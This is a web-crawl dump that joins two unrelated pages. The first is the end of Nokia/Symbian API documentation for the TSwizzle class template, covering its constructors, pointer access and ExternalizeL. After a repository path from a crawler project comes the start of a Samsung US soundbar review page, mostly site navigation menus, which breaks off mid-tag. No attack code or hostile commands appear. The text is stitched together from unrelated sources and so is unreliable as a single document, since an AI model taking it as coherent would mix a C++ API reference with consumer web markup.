class="parameter"> T * aPtr </td> <td> A pointer to a class T type object. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-6537BB86-0A9C-3ECA-8F0C-F46A380E3083"> <a name="GUID-6537BB86-0A9C-3ECA-8F0C-F46A380E3083"> <!-- --> </a> <h2 class="topictitle2"> TSwizzle(TStreamId) </h2> <table class="signature"> <tr> <td> TSwizzle </td> <td> ( </td> <td> <a href="GUID-1C4D4AFD-85E2-3D5D-B704-D1FA0E5E7DA2.html"> TStreamId </a> </td> <td> anId </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Constructs a swizzle for a class T type object, represented as a stream id. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-1C4D4AFD-85E2-3D5D-B704-D1FA0E5E7DA2.html"> TStreamId </a> anId </td> <td> The id of a stream containing the external representation of a class T type object. </td> </tr> </table> </div> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-73FA9507-E3FB-3EC0-8B7B-EDE4869B7199"> <a name="GUID-73FA9507-E3FB-3EC0-8B7B-EDE4869B7199"> <!-- --> </a> <h2 class="topictitle2"> AsPtr() </h2> <table class="signature"> <tr> <td> T * </td> <td> AsPtr </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Returns a pointer to the object which this swizzle represents. </p> <p> Note that the indirect component selector <a href="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006.html#GUID-B24AEF37-56B0-307D-902F-5EF004DCBF83"> operator-&gt;() </a> can be used to access members of the represented object. </p> <p> </p> </div> </div> </div> <div class="nested1" id="GUID-D83E2A30-5F8D-3EC5-AD32-79B49AC38D7E"> <a name="GUID-D83E2A30-5F8D-3EC5-AD32-79B49AC38D7E"> <!-- --> </a> <h2 class="topictitle2"> ExternalizeL(RWriteStream &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> ExternalizeL </td> <td> ( </td> <td> <a href="GUID-ADAC48A2-3D24-306B-9473-70201F4D351D.html"> RWriteStream </a> &amp; </td> <td> aStream </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Externalises the stream id of the stream associated with this swizzle. </p> <p> This function presupposes that: </p> <p> a store map, i.e. an object of type <a href="GUID-D3E27885-46A1-35C1-97E5-17E4EDF72E56.html#GUID-D3E27885-46A1-35C1-97E5-17E4EDF72E56"> CStoreMap </a> , has been constructed </p> <p> the id of the stream containing the external representation of the represented type T object has been bound to this swizzle and added to the store map. </p> <p> the concrete stream referenced by aStream has been constructed, specifying the store map as an externaliser. </p> <p> The presence of this function means that the standard templated operator&lt;&lt;() can be used. </p> <p> <a href="GUID-D3E27885-46A1-35C1-97E5-17E4EDF72E56.html#GUID-D3E27885-46A1-35C1-97E5-17E4EDF72E56"> CStoreMap </a> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-ADAC48A2-3D24-306B-9473-70201F4D351D.html"> RWriteStream </a> &amp; aStream </td> <td> Stream to which the stream id should be externalised. </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-E74F9911-A7F8-3A0D-B268-4DE1022CD756"> <a name="GUID-E74F9911-A7F8-3A0D-B268-4DE1022CD756"> <!-- --> </a> <h2 class="topictitle2"> operator T *() </h2> <table class="signature"> <tr> <td> operator T * </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-3B29DCA7-D161-3298-BD83-BC704984E197"> <a name="GUID-3B29DCA7-D161-3298-BD83-BC704984E197"> <!-- --> </a> <h2 class="topictitle2"> operator*() </h2> <table class="signature"> <tr> <td> T &amp; </td> <td> operator* </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Returns a reference to the type T object which this swizzle represents. </p> <p> </p> </div> </div> </div> <div class="nested1" id="GUID-B24AEF37-56B0-307D-902F-5EF004DCBF83"> <a name="GUID-B24AEF37-56B0-307D-902F-5EF004DCBF83"> <!-- --> </a> <h2 class="topictitle2"> operator-&gt;() </h2> <table class="signature"> <tr> <td> T * </td> <td> operator-&gt; </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Gives access to members of the type T object which this swizzle represents. </p> <p> Note, use the <a href="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006.html#GUID-73FA9507-E3FB-3EC0-8B7B-EDE4869B7199"> AsPtr() </a> member function to return a pointer to the object itself. </p> <p> </p> </div> </div> </div> <div class="nested1" id="GUID-3D9F90EA-6CA5-34BC-8EE0-8A7AFF084D7D"> <a name="GUID-3D9F90EA-6CA5-34BC-8EE0-8A7AFF084D7D"> <!-- --> </a> <h2 class="topictitle2"> operator=(T *) </h2> <table class="signature"> <tr> <td> <a href="GUID-D10FA32F-32F7-3488-9AAC-CB95270EA006.html"> TSwizzle </a> &lt; T &gt; &amp; </td> <td> operator= </td> <td> ( </td> <td> T * </td> <td> aPtr </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Sets this swizzle to represent the in-memory type T object, pointed to by the specified T* pointer. </p> <p> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> T * aPtr </td> <td> A pointer to an object of type T which the swizzle is to represent. </td> </tr> </table> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
WebCrawler-Indexing-Ranking/indexing/Cs454-WebCrawler/content/files/b83f9639-0722-45d4-9178-f4c7e8905892.html
agrpriyal/CS454-SEO
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <link hreflang="en-us" rel="alternate" href="http://www.samsung.com/us/video/home-audio/HW-J7501/ZA"><link rel="icon" href="/us/favicon.ico" type="image/x-icon"><link rel="shortcut icon" href="/us/favicon.ico" type="image/x-icon"><link rel="stylesheet" type="text/css" href="/us/consumer/css/styles.css"><link rel="stylesheet" type="text/css" href="/us/consumer/css/gnb.css"><link rel="stylesheet" type="text/css" href="/us/consumer/css/shop.css"><link rel="stylesheet" type="text/css" href="/us/consumer/css/extra.css"><meta name="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="og:image" content="http://www.samsung.com/us/system/consumer/product/hw/j7/50/hwj7501za/HW-J7501_004_Front-Set_Silver_7.jpg"> <meta name="og:type" content="website"> <meta name="decorator" content="consumerDecorator"> <meta name="og:site_name" content="Samsung Electronics America"> <meta name="keywords" content="SAMSUNG, Home Audio, Soundbars, HW-J7501, HW-J7501/ZA"> <meta name="viewport" content="user-scalable=0, width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0"> <meta name="dc:title" content="Reviews &amp; Ratings - Soundbars HW-J7501 | Samsung Home Audio"> <meta name="Content-Encoding" content="UTF-8"> <meta name="description" content="Visit Samsung today for Samsung HW-J7501 Wireless Multiroom Curved Soundbar w/ Wireless Subwoofer (Silver). You'll find product and support information for our products and information about our company. Imagine what Samsung can do for you!"> <meta name="Content-Type" content="application/xhtml+xml"> <title>Reviews &amp; Ratings - Soundbars HW-J7501 | Samsung Home Audio</title> </head> <body> <a shape="rect" href="/us/"> <img src="/us/ssi/5.0/images/new-samsung-logo.png" alt="Samsung"> </a> <ul> <li><a shape="rect" href="#">Search</a></li> <li><a shape="rect" href="#">Account</a></li> <li><a shape="rect" href="#">Cart</a></li> <li><a shape="rect" href="#">Navigation</a></li> </ul> <a shape="rect" href="#">Logout</a> <ul> <li><img src="/us/onlineopinionV5/oo_icon.gif" alt=""> <a shape="rect" href="#">Feedback</a></li> <li><a shape="rect" href="/us/business">For Business</a></li> <li><a shape="rect" href="/us/aboutsamsung">About Us</a></li> <li> Login <ul> <li> <a shape="rect" href="/us/support/account/">My Profile</a> </li> <li> <a shape="rect" href="#">Log out</a> </li> </ul> </li> <li> <a shape="rect" href="#"> </a> </li> </ul> <ul> <li> <a shape="rect" href="/us/"><img src="/us/ssi/5.0/images/new-samsung-logo.png" alt="Samsung"></a> </li> <li> <a shape="rect" href="#">Shop Products </a> <ul> <li> <a shape="rect" href="/us/shop">Shop Samsung</a> <ul> <li><a shape="rect" href="/us/shop/">Shop All Products</a></li> <li><a shape="rect" href="/us/shop/accessories">Shop All Accessories</a></li> <li><a shape="rect" href="/us/shop/special-offers">Special Offers Online</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/home/en_US/ThemeID.38225500">Certified Refurbished Products</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Browse special offers on new products and our personal recommendations for you. <a shape="rect" href="/us/shop/">Shop Samsung</a> </li> <li> <a shape="rect" href="/us/mobile/cell-phones">Cell Phones </a> <ul> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-s">Galaxy S Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-note">Galaxy Note Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/">Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=prepaid">Prepaid/No Contract</a></li> <li><a shape="rect" href="/us/mobile/at-t">AT&amp;T Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/verizon-wireless">Verizon Wireless Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/sprint">Sprint Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/t-mobile">T-Mobile Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/us-cellular">U.S. Cellular Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=more-carriers">More Carriers</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.70010500/ThemeID.38225500">Certified Pre-Owned Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones">See All Cell Phones</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> The Next Big Thing is Here Galaxy S6 edge+ | Note5 <a shape="rect" href="/us/explore/latest-galaxy-smartphones/">Available Now</a> </li> <li> <a shape="rect" href="/us/video/tvs">TVs</a> <ul> <li><a shape="rect" href="/us/video/4k-suhd-tv">4K SUHD TVs</a></li> <li><a shape="rect" href="/us/video/uhd-tv">4K UHD TVs</a></li> <li><a shape="rect" href="/us/video/led-tv">LED TVs</a></li> <li><a shape="rect" href="/us/business/displays/digital-signage/?filter=smart-signage-tv">Smart Signage TVs</a></li> <li><a shape="rect" href="/us/video/tvs">See All TVs</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> With a deal this good, you gotta go for two. Buy a qualifying† SUHD TV and get a bonus 40” HDTV. <a shape="rect" href="/us/shop/special-offers/big-game-deals">Shop Now</a> </li> <li> <a shape="rect" href="/us/mobile/galaxy-tab/">Tablets</a> <ul> <li><a shape="rect" href="/us/mobile/galaxy-tab/">Galaxy Tabs</a></li> <li><a shape="rect" href="/us/mobile/galaxy-note/">Galaxy Notes</a></li> <li><a shape="rect" href="/us/mobile/wi-fi-tabs">Wi-Fi Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/all-products?filter=4G-LTE">4G / LTE Tablets</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.67795500/ThemeID.38225500">Refurbished Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/">See All Galaxy Tablets</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Galaxy Tab S2 Elevate Your Downtime <a shape="rect" href="/us/explore/tab-s2-features-and-specs/">Buy Now</a> </li> <li> <a shape="rect" href="/us/mobile/wearable-tech">Wearable Tech</a> <ul> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=smartwatches">Smartwatches</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=virtual-reality-headsets">Virtual Reality Headsets</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products">See All Gear</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung Gear S2 With its stylish design and quick access to apps and notifications, the new Samsung Gear S2 helps you dial in to every moment. <a shape="rect" href="/us/explore/gear-s2/">Explore Now</a> </li> <li> <a shape="rect" href="/us/homeappliances">Home Appliances</a> <ul> <li><a shape="rect" href="/us/appliances/washers-dryers">Washers &amp; Dryers</a></li> <li><a shape="rect" href="/us/appliances/refrigerators">Refrigerators</a></li> <li><a shape="rect" href="/us/appliances/microwaves">Microwaves</a></li> <li><a shape="rect" href="/us/appliances/dishwashers">Dishwashers</a></li> <li><a shape="rect" href="/us/appliances/oven-ranges">Ranges</a></li> <li><a shape="rect" href="/us/appliances/vacuums">Vacuums</a></li> <li><a shape="rect" href="/us/showcase/smart-home-appliance-washer-dryer-and-refrigerators/">Reinvent the Home with Home Appliances</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung Ranges have the ultimate cooking flexibility <a shape="rect" href="/us/appliances/oven-ranges">Explore Now</a> </li> <li> <a shape="rect" href="/us/smart-home/">Smart Home</a> <ul> <li><a shape="rect" href="/us/smart-home/kit">Kits</a></li> <li><a shape="rect" href="/us/smart-home/hub">Hubs</a></li> <li><a shape="rect" href="/us/smart-home/sensor">Sensors</a></li> <li><a shape="rect" href="/us/smart-home/outlet">Outlets</a></li> <li><a shape="rect" href="/us/smart-home/smart-products/all-products">See All Smart Home Products</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Smart Home Intelligent Living. Connect all of your compatible smart home decides, and easily control and monitor your home from your smart phone. <a shape="rect" href="/us/smart-home/">Explore Now</a> </li> <li> <a shape="rect" href="/us/video/home-audio/">Home Theater &amp; Audio</a> <ul> <li><a shape="rect" href="/us/video/multi-room">Wireless Multiroom Audio</a></li> <li><a shape="rect" href="/us/video/soundbars">Soundbars</a></li> <li><a shape="rect" href="/us/video/giga-sound-systems">Giga Sound Systems</a></li> <li><a shape="rect" href="/us/video/home-theater">Home Theater Systems</a></li> <li><a shape="rect" href="/us/video/blu-ray-players">Blu-ray Players</a></li> <li><a shape="rect" href="/us/video/dvd-players">DVD Players</a></li> <li><a shape="rect" href="/us/video/home-audio/">See All Home Audio Products</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Radiant360 R5 Wi-Fi/Bluetooth Speaker Hear the full, rich sound of your favorite music from anywhere in the room. <a shape="rect" href="/us/experience/radiant360">Learn More</a> </li> <li> <a shape="rect" href="/us/photography/digital-cameras">Digital Cameras &amp; Camcorders</a> <ul> <li><a shape="rect" href="/us/photography/interchangeable-lens">Interchangeable Lens Cameras</a></li> <li><a shape="rect" href="/us/photography/galaxy-camera">Galaxy Cameras</a></li> <li><a shape="rect" href="/us/photography/compact-long-zoom">Long Zoom Cameras</a></li> <li><a shape="rect" href="/us/photography/point-and-shoot">Point and Shoot Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-camcorders">HD Camcorders</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.69535600/ThemeID.38225500">Refurbished Digital Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-cameras/">See All Digital Cameras and Camcorders</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> NX1 28 MP Smart 4K Camera Featuring 4K UHD Video and up to 15 frames per second continuous shooting <a shape="rect" href="/us/photography/digital-cameras/EV-NX1ZZZBQBUS">See Product</a> </li> <li> <a shape="rect" href="/us/computer/pcs">Computing</a> <ul> <li><a shape="rect" href="/us/computer/laptops">Laptops</a></li> <li><a shape="rect" href="/us/computer/chromebook">Chromebooks</a></li> <li><a shape="rect" href="/us/computer/all-in-one-pcs">All-In-One PCs</a></li> <li><a shape="rect" href="/us/computer/monitors">Monitors</a></li> <li><a shape="rect" href="/us/computer/printers">Printers</a></li> <li><a shape="rect" href="/us/computer/pcs/">See All PCs</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> ATIV Book 9 Spin Get the ultimate versatility, portability, and style with a revolutionary 360° rotating display <a shape="rect" href="/us/computer/pcs/NP940X3L-K01US">Explore Now</a> </li> <li> <a shape="rect" href="/us/computer/memory-storage">Memory &amp; Storage</a> <ul> <li><a shape="rect" href="/us/computer/ssd-pro">SSD PRO</a></li> <li><a shape="rect" href="/us/computer/ssd-evo">SSD EVO</a></li> <li><a shape="rect" href="/us/computer/portable-ssd/">Portable SSD</a></li> <li><a shape="rect" href="/us/computer/memory-storage-accessories/">Memory Cards &amp; USB Drives</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Introducing the new SSD T3 with 2TB capacity in an ultra-compact, portable design. <a shape="rect" href="/us/computer/memory-storage/MU-PT2T0B/AM">Learn More</a> </li> <li> <a shape="rect" href="/us/appliances/led-lighting">LED Lighting</a> <ul> <li><a shape="rect" href="/us/appliances/led-lighting">LED Home Lighting</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Non-Dimmable A19 LED LightBulb Brighten your household with our long-lasting, energy-efficient LED lighting. <a shape="rect" href="/us/appliances/led-lighting/SI-I8W061140US">See Product</a> </li> <li> <a shape="rect" href="javascript:;">Security &amp; Monitoring</a> <ul> <li><a shape="rect" href="/us/security-and-monitoring/ip-cameras">IP Cameras</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems/">Security Systems</a></li> <li><a shape="rect" href="/us/security-and-monitoring/baby-monitors">Baby Monitors</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung SmartCam HD Pro makes it simpler than ever to keep an eye on home. <a shape="rect" href="/us/security-and-monitoring/ip-cameras/SNH-P6410BN">See Product</a> </li> <li> <a shape="rect" href="/us/accessories/home">Accessories</a> <ul> <li><a shape="rect" href="/us/video/tvs-accessories">TV Accessories</a></li> <li><a shape="rect" href="/us/mobile/cell-phones-accessories">Cell Phone Accessories</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab-accessories">Tablet Accessories</a></li> <li><a shape="rect" href="/us/computer/printers-accessories">Printer Accessories</a></li> <li><a shape="rect" href="/us/computer/pcs-accessories">PC Accessories</a></li> <li><a shape="rect" href="/us/photography/digital-cameras-accessories">Digital Camera Accessories</a></li> <li><a shape="rect" href="/us/appliances/refrigerators-accessories">Refrigerator Accessories</a></li> <li><a shape="rect" href="/us/appliances/washers-dryers-accessories">Washer &amp; Dryer Accessories</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems-accessories/">Security System Accessories</a></li> <li><a shape="rect" href="/us/appliances/vacuums-accessories/">Vacuum Accessories</a></li> </ul> <img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung Level On Wireless Headphones High-definition 40mm drivers combine with Active Noise Cancelation to deliver exceptionally clear sound <a shape="rect" href="/us/explore/level-wireless-headphones-accessories/">See Product</a> </li> </ul> </li> <li> <a shape="rect" href="#">Apps </a> <ul> <li><a shape="rect" href="/us/apps/"></a><img src="/us/ssi/5.0/images/1px.png" alt=""> Apps For Every Screen</li> <li><a shape="rect" href="/us/showcase/milk/"></a><img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung Milk Music</li> <li><a shape="rect" href="/us/samsung-pay/"></a><img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung Pay</li> <li><a shape="rect" href="/us/samsung-plus/"></a><img src="/us/ssi/5.0/images/1px.png" alt=""> Samsung+</li> <li><a shape="rect" href="/us/smart-switch/"></a><img src="/us/ssi/5.0/images/1px.png" alt=""> Smart Switch</li> </ul> </li> <li> <a shape="rect" href="#">Owners &amp; Support </a> <ul> <li><a shape="rect" href="/us/support/">Get Support</a></li> <li><a shape="rect" href="/us/support/account/">Samsung Account</a></li> <li><a shape="rect" href="/us/support/get-started">Set Up Your New Device</a></li> <li><a shape="rect" href="/us/experience/skills-workshop/">Samsung Skills Workshop</a></li> <li><a shape="rect" href="/us/support/account/">Register Your Device</a></li> <li><a shape="rect" href="/us/support/downloads">Manuals &amp; Downloads</a></li> <li><a shape="rect" href="/us/support/contact-customer-services/">Help With Your Order</a></li> <li><a shape="rect" href="/us/support/contact">Contact Support</a></li> </ul> </li> <li> <a shape="rect" href="#"></a> </li> </ul> <ul> <li> <a shape="rect" href="#">Shop Products </a> <ul> <li> <a shape="rect" href="#">Shop Samsung </a> <ul> <li><a shape="rect" href="/us/shop/">Shop All Products</a></li> <li><a shape="rect" href="/us/shop/accessories">Shop All Accessories</a></li> <li><a shape="rect" href="/us/shop/special-offers">Special Offers Online</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/home/en_US/ThemeID.38225500">Certified Refurbished Products</a></li> </ul> </li> <li> <a shape="rect" href="#">Cell Phones </a> <ul> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-s">Galaxy S Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-note">Galaxy Note Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/">Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=prepaid">Prepaid/No Contract</a></li> <li><a shape="rect" href="/us/mobile/at-t">AT&amp;T Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/verizon-wireless">Verizon Wireless Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/sprint">Sprint Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/t-mobile">T-Mobile Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/us-cellular">U.S. Cellular Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=more-carriers">More Carriers</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.70010500/ThemeID.38225500">Certified Pre-Owned Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones">See All Cell Phones</a></li> </ul> </li> <li> <a shape="rect" href="#">TVs </a> <ul> <li><a shape="rect" href="/us/video/4k-suhd-tv">4K SUHD TVs</a></li> <li><a shape="rect" href="/us/video/uhd-tv">4K UHD TVs</a></li> <li><a shape="rect" href="/us/video/led-tv">LED TVs</a></li> <li><a shape="rect" href="/us/video/tvs/">See All TVs</a></li> </ul> </li> <li> <a shape="rect" href="#">Tablets </a> <ul> <li><a shape="rect" href="/us/mobile/galaxy-tab/">Galaxy Tabs</a></li> <li><a shape="rect" href="/us/mobile/galaxy-note/">Galaxy Notes</a></li> <li><a shape="rect" href="/us/mobile/wi-fi-tabs">Wi-Fi Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/all-products?filter=4G-LTE">4G / LTE Tablets</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.67795500/ThemeID.38225500">Refurbished Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/">See All Galaxy Tablets</a></li> </ul> </li> <li> <a shape="rect" href="#">Wearable Tech </a> <ul> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=smartwatches">Smartwatches</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=virtual-reality-headsets">Virtual Reality Headsets</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products">See All Gear</a></li> </ul> </li> <li> <a shape="rect" href="#">Home Appliances </a> <ul> <li><a shape="rect" href="/us/appliances/washers-dryers">Washers &amp; Dryers</a></li> <li><a shape="rect" href="/us/appliances/refrigerators">Refrigerators</a></li> <li><a shape="rect" href="/us/appliances/microwaves">Microwaves</a></li> <li><a shape="rect" href="/us/appliances/dishwashers">Dishwashers</a></li> <li><a shape="rect" href="/us/appliances/oven-ranges">Ranges</a></li> <li><a shape="rect" href="/us/appliances/vacuums">Vacuums</a></li> <li><a shape="rect" href="/us/homeappliances/">Explore Home Appliances</a></li> </ul> </li> <li> <a shape="rect" href="#">Smart Home </a> <ul> <li><a shape="rect" href="/us/smart-home/kit">Kits</a></li> <li><a shape="rect" href="/us/smart-home/hub">Hubs</a></li> <li><a shape="rect" href="/us/smart-home/sensor">Sensors</a></li> <li><a shape="rect" href="/us/smart-home/outlet">Outlets</a></li> </ul> </li> <li> <a shape="rect" href="#">Home Theater &amp; Audio </a> <ul> <li><a shape="rect" href="/us/video/multi-room">Wireless Multiroom Audio</a></li> <li><a shape="rect" href="/us/video/soundbars">Soundbars</a></li> <li><a shape="rect" href="/us/video/giga-sound-systems">Giga Sound Systems</a></li> <li><a shape="rect" href="/us/video/home-theater">Home Theater Systems</a></li> <li><a shape="rect" href="/us/video/blu-ray-players">Blu-ray Players</a></li> <li><a shape="rect" href="/us/video/dvd-players">DVD Players</a></li> <li><a shape="rect" href="/us/video/home-audio/">See All Home Audio Products</a></li> </ul> </li> <li> <a shape="rect" href="#">Digital Cameras &amp; Camcorders </a> <ul> <li><a shape="rect" href="/us/photography/interchangeable-lens">Interchangeable Lens Cameras</a></li> <li><a shape="rect" href="/us/photography/galaxy-camera">Galaxy Cameras</a></li> <li><a shape="rect" href="/us/photography/compact-long-zoom">Long Zoom Cameras</a></li> <li><a shape="rect" href="/us/photography/point-and-shoot">Point and Shoot Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-camcorders">HD Camcorders</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.69535600/ThemeID.38225500">Refurbished Digital Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-cameras/">See All Digital Cameras and Camcorders</a></li> </ul> </li> <li> <a shape="rect" href="#">Computing </a> <ul> <li><a shape="rect" href="/us/computer/laptops">Laptops</a></li> <li><a shape="rect" href="/us/computer/chrome-os-devices">Chrome Devices</a></li> <li><a shape="rect" href="/us/computer/all-in-one-pcs">All-In-One PCs</a></li> <li><a shape="rect" href="/us/computer/monitors">Monitors</a></li> <li><a shape="rect" href="/us/computer/printers">Printers</a></li> <li><a shape="rect" href="/us/computer/pcs/">See All PCs</a></li> </ul> </li> <li> <a shape="rect" href="#">Memory &amp; Storage</a> <ul> <li><a shape="rect" href="/us/computer/ssd-pro">SSD PRO</a></li> <li><a shape="rect" href="/us/computer/ssd-evo">SSD EVO</a></li> <li><a shape="rect" href="/us/computer/portable-ssd/">Portable SSD</a></li> <li><a shape="rect" href="/us/computer/memory-storage-accessories/">Memory Cards &amp; USB Drives</a></li> </ul> </li> <li> <a shape="rect" href="#">LED Lighting </a> <ul> <li><a shape="rect" href="/us/appliances/led-lighting">LED Home Lighting</a></li> </ul> </li> <li> <a shape="rect" href="#">Security &amp; Monitoring </a> <ul> <li><a shape="rect" href="/us/security-and-monitoring/ip-cameras">IP Cameras</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems/">Security Systems</a></li> <li><a shape="rect" href="/us/security-and-monitoring/baby-monitors">Baby Monitors</a></li> </ul> </li> <li> <a shape="rect" href="#">Accessories </a> <ul> <li><a shape="rect" href="/us/video/tvs-accessories">TV Accessories</a></li> <li><a shape="rect" href="/us/mobile/cell-phones-accessories">Cell Phone Accessories</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab-accessories">Tablet Accessories</a></li> <li><a shape="rect" href="/us/computer/printers-accessories">Printer Accessories</a></li> <li><a shape="rect" href="/us/computer/pcs-accessories">PC Accessories</a></li> <li><a shape="rect" href="/us/photography/digital-cameras-accessories">Digital Camera Accessories</a></li> <li><a shape="rect" href="/us/appliances/refrigerators-accessories">Refrigerator Accessories</a></li> <li><a shape="rect" href="/us/appliances/washers-dryers-accessories">Washer &amp; Dryer Accessories</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems-accessories/">Security System Accessories</a></li> <li><a shape="rect" href="/us/appliances/vacuums-accessories/">Vacuum Accessories</a></li> </ul> </li> </ul> </li> <li> <a shape="rect" href="#">Apps </a> <ul> <li><a shape="rect" href="/us/apps/">Apps For Every Screen</a></li> <li><a shape="rect" href="/us/showcase/milk/">Samsung Milk Music</a></li> <li><a shape="rect" href="/us/samsung-pay/">Samsung Pay</a></li> <li><a shape="rect" href="/us/samsung-plus/">Samsung+</a></li> <li><a shape="rect" href="/us/smart-switch/">Smart Switch</a></li> </ul> </li> <li> <a shape="rect" href="#">Owners &amp; Support</a> <ul> <li><a shape="rect" href="/us/support/">Get Support</a></li> <li><a shape="rect" href="/us/support/account/">Samsung Account</a></li> <li><a shape="rect" href="/us/support/get-started">Set Up Your New Device</a></li> <li><a shape="rect" href="/us/experience/skills-workshop/">Samsung Skills Workshop</a></li> <li><a shape="rect" href="/us/support/account/">Register Your Device</a></li> <li><a shape="rect" href="/us/support/downloads">Manuals &amp; Downloads</a></li> <li><a shape="rect" href="/us/support/contact-customer-services/">Help With Your Order</a></li> <li><a shape="rect" href="/us/support/contact">Contact Support</a></li> </ul> </li> </ul> <ul> <li><a shape="rect" href="/us/business">For Business</a></li> <li><a shape="rect" href="/us/aboutsamsung">About Us</a></li> <li><a shape="rect" href="http://livechatmobile.biz/">Live Chat</a></li> <li><a shape="rect" href="#">Feedback</a></li> </ul> <a shape="rect" href="/us/">Home</a> &gt; <a shape="rect" href="/us/shop/">Shop</a> &gt; <a shape="rect" href="/us/video/home-audio">Home Audio</a> &gt; <a shape="rect" href="/us/video/soundbars">Soundbars</a> &gt; <a shape="rect" href="/us/video/home-audio/HW-J7501/ZA">HW-J7501/ZA</a> &gt; Reviews <ul> <li><a shape="rect" href="/us/support/customer-services">Help With My Order</a></li> <li> <a shape="rect" href="#">Share</a> <ul> <li><a 